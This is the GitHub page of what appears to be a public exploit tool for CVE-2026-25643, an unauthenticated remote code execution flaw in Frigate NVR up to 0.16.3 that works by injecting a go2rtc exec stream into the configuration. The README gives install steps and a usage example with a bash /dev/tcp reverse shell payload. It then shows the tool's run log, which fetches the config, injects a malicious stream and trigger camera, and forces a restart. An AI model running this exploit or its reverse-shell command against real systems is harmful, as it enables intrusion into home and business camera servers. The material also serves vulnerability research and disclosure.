Skip to content

joshuavanderpoll/CVE-2026-25643

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
assets
assets
 
 
docker
docker
 
 
.gitignore
.gitignore
 
 
CONTRIBUTING.md
CONTRIBUTING.md
 
 
CVE-2026-25643.py
CVE-2026-25643.py
 
 
LICENSE.md
LICENSE.md
 
 
README.md
README.md
 
 
SECURITY.md
SECURITY.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Frigate NVR ≤ 0.16.3 Blind RCE Exploit (CVE-2026-25643) PoC

Python

📜 Description

This Python exploit targets a critical configuration manipulation vulnerability in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths). By injecting a malicious go2rtc stream and a fake camera entry, it triggers arbitrary command execution as the Frigate process during service restart — no reverse shell or output capture required.

🛠️ Installation

Note

To ensure a clean and isolated environment for the project dependencies, it's recommended to use Python's venv module.

OSX/Linux

git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Usage

python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/

 Target : http://localhost:5001
 Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1

[!] No credentials provided → attempting unauthenticated access
[*] Fetching current configuration (/api/config/raw) ...
[*] Config fetch → HTTP 200
[*] Received 914 bytes
[*] Config was JSON-wrapped → unwrapped
[+] Config parsed successfully (7 top-level keys)
[*] Preparing payload → executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Injected malicious stream → debug_cmd
[+] Injected trigger camera → trigger_exec
[*] Sending modified config (861 bytes) with option: restart
[*] Config save → HTTP 200
[+] Configuration accepted (server should restart)

============================================================
 Payload sent! Command should execute during go2rtc init / camera probe.
 Keep in mind:
 • Output is NOT captured (blind execution)
 • Command runs as the user/frigate process
 • Multiple executions may occur during restart
============================================================

🐋 Docker PoC

cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:5001

💻 Example

Execute PoC Receive connection

🕵🏼 References

📢 Disclaimer

This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.

About

CVE-2026-25643: Frigate ≤0.16.3 Blind RCE via go2rtc exec injection

hackindex.io/vulnerabilities/CVE-2026-25643

Topics

python security exploit exploits rce vulnerability pentesting vulnerabilities cve security-tools pentest-tool frigate cve-2026-25643

Resources

Readme

License

GPL-3.0 license

Contributing

Contributing

Security policy

Security policy
Activity

Stars

3 stars

Watchers

0 watching

Forks

0 forks
Report repository

Languages